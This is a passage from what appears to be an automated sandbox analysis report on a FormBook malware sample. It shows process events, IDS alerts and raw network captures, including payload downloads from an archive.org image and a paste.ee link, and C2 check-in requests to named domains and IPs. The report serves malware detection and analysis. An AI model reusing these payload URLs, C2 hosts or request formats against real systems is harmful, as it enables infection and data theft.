              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 11_2_0309C3C0 FindFirstFileW,FindNextFileW,FindClose,11_2_0309C3C0

              Software Vulnerabilities

              barindex
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 4x nop then xor eax, eax11_2_03089A80
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 4x nop then pop edi11_2_0308E02B
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 4x nop then pop edi11_2_030A24F5
              Source: C:\Windows\SysWOW64\dllhost.exeCode function: 4x nop then mov ebx, 00000004h11_2_036804E2
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 4x nop then pop edi12_2_05451D61
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 4x nop then pop edi12_2_05461CFB
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 4x nop then xor eax, eax12_2_05456618
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 4x nop then pop edi12_2_05452A60
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeCode function: 4x nop then mov esp, ebp12_2_05450AA0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49959 -> 172.96.186.204:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49965 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49967 -> 3.33.130.190:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49955 -> 18.163.12.6:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49960 -> 172.96.186.204:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49958 -> 172.96.186.204:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49963 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49954 -> 18.163.12.6:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49956 -> 18.163.12.6:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:49964 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.6:49724 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE Malicious Base64 Encoded Payload In Image : 207.241.227.242:443 -> 192.168.2.6:49711
              Source: unknownDNS query: name: paste.ee
              Source: DNS query: www.568060007.xyz
              Source: global trafficHTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1Host: ia600102.us.archive.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/mFPBh/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewASN Name: INTERNET-ARCHIVEUS INTERNET-ARCHIVEUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1Host: ia600102.us.archive.orgConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/mFPBh/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /fx9f/?mBsxM=YJ0LnZ68&-Xr8=yLkskDR0nY0t6IEYTVnouV0HkzfvHuAPmfbD5h8cln4aJalo4AVzLarmhH7o5TO/QYT7rLdNwPAjvarY55z4bEJvcGnuntwn6BS5zidhK+0y0eRY5oQOsBmzZX59GbhTRCQZQus= HTTP/1.1Host: www.autoclean.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
              Source: global trafficHTTP traffic detected: GET /2jpw/?-Xr8=qz9UzJ10+p/cjPnRdZlHv4YDQxf45KubwzSEjjTwjD/nUvv1s93evwIp+LTko4UKBcY0h9JnEtV5jsbq23POiYFTmg8OGBnfOhN/rQscVBLiXL1oe2kzRKc9D7hJiq/ZgM9Sylw=&mBsxM=YJ0LnZ68 HTTP/1.1Host: www.568060007.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
              Source: global trafficHTTP traffic detected: GET /iaoq/?-Xr8=nL2348Pfr+NFoI01B13i6ooM2GhLPn5db8T/pNEZx3omavlXh0CLNHmy0NPG1pf7zjIobHCC6tPoB9SY98rXt0wu24FP/Owek6nccbtLOiVilNhWN1FN3veqOsXp1hjRF8Z6s4A=&mBsxM=YJ0LnZ68 HTTP/1.1Host: www.elitecbdgummies.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
              Source: global trafficHTTP traffic detected: GET /ojib/?-Xr8=9xYabYlQOuR2q+ns8Lzx9bRF8NZUoInv7x1TfUGCdfPrsqjtDMlDvLTTdBF+pu/1Frk+h/DxANwT0Hfs8j1jMkaM33w5ilCaxHtuGNiB0DtKNuQLcX24gGfpbrwRywwLDdzHNLM=&mBsxM=YJ0LnZ68 HTTP/1.1Host: www.airgame.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0
              Source: global trafficDNS traffic detected: DNS query: ia600102.us.archive.org
              Source: global trafficDNS traffic detected: DNS query: paste.ee
              Source: global trafficDNS traffic detected: DNS query: www.autoclean.shop
              Source: global trafficDNS traffic detected: DNS query: www.568060007.xyz
              Source: global trafficDNS traffic detected: DNS query: www.elitecbdgummies.net
              Source: global trafficDNS traffic detected: DNS query: www.airgame.store
              Source: global trafficDNS traffic detected: DNS query: www.1ns6mg.vip
              Source: unknownHTTP traffic detected: POST /2jpw/ HTTP/1.1Host: www.568060007.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-usConnection: closeCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 209Origin: http://www.568060007.xyzReferer: http://www.568060007.xyz/2jpw/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:37.0) Gecko/20100101 Firefox/37.0Data Raw: 2d 58 72 38 3d 6e 78 56 30 77 35 35 72 78 5a 69 5a 72 66 44 5a 61 35 31 66 72 39 6b 6f 52 78 7a 45 31 71 4f 2b 6b 54 44 59 32 7a 6e 35 78 53 54 78 47 4a 2f 41 6a 64 6a 77 79 53 49 48 2f 35 62 4c 71 71 4a 6b 4d 6f 59 6f 6c 38 4d 52 46 50 56 38 30 75 2b 61 35 68 65 43 33 70 78 4d 6e 47 4e 31 4a 51 33 46 4e 41 31 4c 68 67 55 66 4d 6b 62 42 51 35 35 35 44 79 49 49 51 64 4d 48 4e 70 63 66 71 70 72 73 30 2b 6c 55 79 79 39 6e 58 70 42 41 5a 6a 66 75 33 46 79 48 70 57 43 4d 77 45 39 58 39 35 6c 59 43 37 35 68 44 53 76 2f 77 62 56 61 6b 47 35 4a 6c 61 38 49 32 41 45 58 71 6d 44 53 63 6b 2f 36 6d 41 33 7a 6c 4b 45 4b 6a 59 6f 4b Data Ascii: -Xr8=nxV0w55rxZiZrfDZa51fr9koRxzE1qO+kTDY2zn5xSTxGJ/AjdjwySIH/5bLqqJkMoYol8MRFPV80u+a5heC3pxMnGN1JQ3FNA1LhgUfMkbBQ555DyIIQdMHNpcfqprs0+lUyy9nXpBAZjfu3FyHpWCMwE9X95lYC75hDSv/wbVakG5Jla8I2AEXqmDSck/6mA3zlKEKjYoK
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/8.5X-Powered-By: ASP.NETAccess-Control-Allow-Origin: *Access-Control-Allow-Methods: GETAccess-Control-Allow-Headers: Content-Type, AuthorizationDate: Thu, 10 Oct 2024 08:01:24 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://elitecbdgummies.net/wp-json/>; rel="https://api.w.org/"x-litespeed-tag: 3eb_HTTP.404,3eb_PGSRPx-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 10 Oct 2024 08:01:37 GMTserver: LiteSpeedData Raw: 35 33 63 32 0d 0a f4 ff 1f 8a 48 56 6a 3d 14 51 55 eb e1 32 03 ae 66 f5 00 a8 5a 24 64 5e b0 fa e3 d7 9f 7f fe fb cb c0 d8 1d 10 cb 76 5c cf f7 9f bf d4 be eb 9f 2f ac 9d c1 52 22 04 76 ce e2 2a bd 8e dd 3b cd 5e 21 b3 23 c4 03 2b 15 12 2b 3d ec 78 28 97 4d ab f7 cc e7 d5 55 be 60 ee 5a 58 dd 0a 80 26 bc be 53 02 04 56 0d 69 25 70 d8 b0 98 aa ff b7 93 4f f8 63 fb 8f 15 53 1e 89 2d a7 ad f3 e6 0d 12 61 09 11 08 a8 20 29 47 59 fc 69 f5 df ec cf 57 ae 54 1f 33 7d 4b 69 61 30 93 b9 f6 8a 00 05 14 8c e4 95 e5 94 2b ff a7 69 59 0c 24 d1 1f f8 20 29 a3 70 14 c0 43 3c 30 ee 56 6b 66 64 ab d5 da 26 7d 9c 7c 1f c0 07 50 cd 42 15 5c 55 20 a5 e1 32 89 1d c4 1b 44 9b db 57 aa 95 32 99 b3 49 a2 24 50 7a 77 6f 7c 28 1b f9 ec 33 e9 a3 1e 13 00 bb 0c 00 ee 1b 60 c9 00 58 32 00 c9 0d 80 25 03 70 ef c6 00 03 ae f1 6f 78 ce f3 3d cf 5a ac 09 76 65 df da 58 a1 e2 bd 93 b1 2e 55 12 50 8a fe 7d aa f0 4b 41 a4 52 a4 ff 7f 6f 5a f1 8d 11 b0 94 01 ed e8 99 0d 09 2d ca 84 de 7b df 03 55 2a 01 c9 6e a0 6a 1b c8 f2 a4 a0 1e 7b 26 df 77 d3 ab fa f5 eb 97 24 cb b1 73 72 7b 53 4a 87 2f 21 13 32 da 90 e0 d2 25 ec 4b 9b 6a 42 62 7d 16 2d cf 70 01 81 43 f8 3e 8e 72 ff 73 a8 a4 d0 3e ec 63 64 73 47 1d 12 ea af 7e da 10 d5 7e 4e 83 86 6d 45 82 3b 48 9d b4 cb e1 fb 6d ef f7 bb dd 8a 46 44 10 6a a5 a9 8d a1 55 be 57 61 a8 22 ba b9 2f fe 90 e9 d7 de 9f cb 46 32 44 31 f0 c8 c5 b8 1c 95 75 7b ef d3 19 92 20 08 22 d8 8a 9e d4 2c 5e ec b0 b7 bd 57 9d 4f 12 70 d9 dd 2d b9 59 3c fb 69 f8 4c 12 57 38 fc 35 e2 71 00 49 76 88 43 99 e7 51 ef a0 57 c2 87 2e ff 0b ea 5b 83 40 6e 16 cf 9a 66 5c 53 ef 54 88 80 92 fc 54 3c e3 f8 75 dd 21 0e 19 fc 3f 9a bd 24 24 9e 13 82 43 49 3e bf 97 d0 74 40 ab 9c ea 41 12 a1 64 bd 93 5f 6b 1f 22 a3 d8 c0 7f 4f fe de 67 51 2b 0b 72 cd e3 2e 18 f7 2d 43 9f b5 06 a5 f3 a0 bf 13 34 68 e1 e6 37 d5 41 e2 3c 26 fd 6b fd 6e d2 1f ae 37 eb f5 36 b9 85 61 44 15 c6 92 d0 92 fc 02 87 d8 74 1a ff 46 d5 1a ab e0 6b 8f 71 45 d0 7c ab 5e 3d 65 a6 57 1d 64 3f 03 df 0c 87 72 fc 8c 3f 91 55 92 df 2c 5e 58 e3 be 25 01 ac 5c 35 2e 66 03 be df 06 ea dd aa d9 88 5f 0d f2 1c ac 41 d0 75 d3 8d 7d 6f 20 0a 07 18 f8 67 aa f5 0e a3 e8 bc ef 2c a8 c1 44 a1 7d bf 1e 05 91 86 bd d5 0a 8d 77 b9 54 88 39 90 49 5a 9c bb bd e4 03 40 f3 6e d2 Data Ascii: 53c2HVj=QU2fZ$d^v\/R"v*;^!#++=x(MU`ZX&SVi%pOcS-a )GYiWT3}Kia0+iY$ )pC<0Vkfd&}|PB\U 2DW2I$Pzwo|(3`X2
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://elitecbdgummies.net/wp-json/>; rel="https://api.w.org/"x-litespeed-tag: 3eb_HTTP.404,3eb_PGSRPx-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 10 Oct 2024 08:01:40 GMTserver: LiteSpeedData Raw: 35 33 63 32 0d 0a f4 ff 1f 8a 48 56 6a 3d 14 51 55 eb e1 32 03 ae 66 f5 00 a8 5a 24 64 5e b0 fa e3 d7 9f 7f fe fb cb c0 d8 1d 10 cb 76 5c cf f7 9f bf d4 be eb 9f 2f ac 9d c1 52 22 04 76 ce e2 2a bd 8e dd 3b cd 5e 21 b3 23 c4 03 2b 15 12 2b 3d ec 78 28 97 4d ab f7 cc e7 d5 55 be 60 ee 5a 58 dd 0a 80 26 bc be 53 02 04 56 0d 69 25 70 d8 b0 98 aa ff b7 93 4f f8 63 fb 8f 15 53 1e 89 2d a7 ad f3 e6 0d 12 61 09 11 08 a8 20 29 47 59 fc 69 f5 df ec cf 57 ae 54 1f 33 7d 4b 69 61 30 93 b9 f6 8a 00 05 14 8c e4 95 e5 94 2b ff a7 69 59 0c 24 d1 1f f8 20 29 a3 70 14 c0 43 3c 30 ee 56 6b 66 64 ab d5 da 26 7d 9c 7c 1f c0 07 50 cd 42 15 5c 55 20 a5 e1 32 89 1d c4 1b 44 9b db 57 aa 95 32 99 b3 49 a2 24 50 7a 77 6f 7c 28 1b f9 ec 33 e9 a3 1e 13 00 bb 0c 00 ee 1b 60 c9 00 58 32 00 c9 0d 80 25 03 70 ef c6 00 03 ae f1 6f 78 ce f3 3d cf 5a ac 09 76 65 df da 58 a1 e2 bd 93 b1 2e 55 12 50 8a fe 7d aa f0 4b 41 a4 52 a4 ff 7f 6f 5a f1 8d 11 b0 94 01 ed e8 99 0d 09 2d ca 84 de 7b df 03 55 2a 01 c9 6e a0 6a 1b c8 f2 a4 a0 1e 7b 26 df 77 d3 ab fa f5 eb 97 24 cb b1 73 72 7b 53 4a 87 2f 21 13 32 da 90 e0 d2 25 ec 4b 9b 6a 42 62 7d 16 2d cf 70 01 81 43 f8 3e 8e 72 ff 73 a8 a4 d0 3e ec 63 64 73 47 1d 12 ea af 7e da 10 d5 7e 4e 83 86 6d 45 82 3b 48 9d b4 cb e1 fb 6d ef f7 bb dd 8a 46 44 10 6a a5 a9 8d a1 55 be 57 61 a8 22 ba b9 2f fe 90 e9 d7 de 9f cb 46 32 44 31 f0 c8 c5 b8 1c 95 75 7b ef d3 19 92 20 08 22 d8 8a 9e d4 2c 5e ec b0 b7 bd 57 9d 4f 12 70 d9 dd 2d b9 59 3c fb 69 f8 4c 12 57 38 fc 35 e2 71 00 49 76 88 43 99 e7 51 ef a0 57 c2 87 2e ff 0b ea 5b 83 40 6e 16 cf 9a 66 5c 53 ef 54 88 80 92 fc 54 3c e3 f8 75 dd 21 0e 19 fc 3f 9a bd 24 24 9e 13 82 43 49 3e bf 97 d0 74 40 ab 9c ea 41 12 a1 64 bd 93 5f 6b 1f 22 a3 d8 c0 7f 4f fe de 67 51 2b 0b 72 cd e3 2e 18 f7 2d 43 9f b5 06 a5 f3 a0 bf 13 34 68 e1 e6 37 d5 41 e2 3c 26 fd 6b fd 6e d2 1f ae 37 eb f5 36 b9 85 61 44 15 c6 92 d0 92 fc 02 87 d8 74 1a ff 46 d5 1a ab e0 6b 8f 71 45 d0 7c ab 5e 3d 65 a6 57 1d 64 3f 03 df 0c 87 72 fc 8c 3f 91 55 92 df 2c 5e 58 e3 be 25 01 ac 5c 35 2e 66 03 be df 06 ea dd aa d9 88 5f 0d f2 1c ac 41 d0 75 d3 8d 7d 6f 20 0a 07 18 f8 67 aa f5 0e a3 e8 bc ef 2c a8 c1 44 a1 7d bf 1e 05 91 86 bd d5 0a 8d 77 b9 54 88 39 90 49 5a 9c bb bd e4 03 40 f3 6e d2 Data Ascii: 53c2HVj=QU2fZ$d^v\/R"v*;^!#++=x(MU`ZX&SVi%pOcS-a )GYiWT3}Kia0+iY$ )pC<0Vkfd&}|PB\U 2DW2I$Pzwo|(3`X2
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/7.4.33expires: Wed, 11 Jan 1984 05:00:00 GMTcontent-type: text/html; charset=UTF-8link: <https://elitecbdgummies.net/wp-json/>; rel="https://api.w.org/"x-litespeed-tag: 3eb_HTTP.404,3eb_PGSRPx-litespeed-cache-control: no-cachecache-control: no-cache, no-store, must-revalidate, max-age=0transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Thu, 10 Oct 2024 08:01:43 GMTserver: LiteSpeedData Raw: 35 33 63 32 0d 0a f4 ff 1f 8a 48 56 6a 3d 14 51 55 eb e1 32 03 ae 66 f5 00 a8 5a 24 64 5e b0 fa e3 d7 9f 7f fe fb cb c0 d8 1d 10 cb 76 5c cf f7 9f bf d4 be eb 9f 2f ac 9d c1 52 22 04 76 ce e2 2a bd 8e dd 3b cd 5e 21 b3 23 c4 03 2b 15 12 2b 3d ec 78 28 97 4d ab f7 cc e7 d5 55 be 60 ee 5a 58 dd 0a 80 26 bc be 53 02 04 56 0d 69 25 70 d8 b0 98 aa ff b7 93 4f f8 63 fb 8f 15 53 1e 89 2d a7 ad f3 e6 0d 12 61 09 11 08 a8 20 29 47 59 fc 69 f5 df ec cf 57 ae 54 1f 33 7d 4b 69 61 30 93 b9 f6 8a 00 05 14 8c e4 95 e5 94 2b ff a7 69 59 0c 24 d1 1f f8 20 29 a3 70 14 c0 43 3c 30 ee 56 6b 66 64 ab d5 da 26 7d 9c 7c 1f c0 07 50 cd 42 15 5c 55 20 a5 e1 32 89 1d c4 1b 44 9b db 57 aa 95 32 99 b3 49 a2 24 50 7a 77 6f 7c 28 1b f9 ec 33 e9 a3 1e 13 00 bb 0c 00 ee 1b 60 c9 00 58 32 00 c9 0d 80 25 03 70 ef c6 00 03 ae f1 6f 78 ce f3 3d cf 5a ac 09 76 65 df da 58 a1 e2 bd 93 b1 2e 55 12 50 8a fe 7d aa f0 4b 41 a4 52 a4 ff 7f 6f 5a f1 8d 11 b0 94 01 ed e8 99 0d 09 2d ca 84 de 7b df 03 55 2a 01 c9 6e a0 6a 1b c8 f2 a4 a0 1e 7b 26 df 77 d3 ab fa f5 eb 97 24 cb b1 73 72 7b 53 4a 87 2f 21 13 32 da 90 e0 d2 25 ec 4b 9b 6a 42 62 7d 16 2d cf 70 01 81 43 f8 3e 8e 72 ff 73 a8 a4 d0 3e ec 63 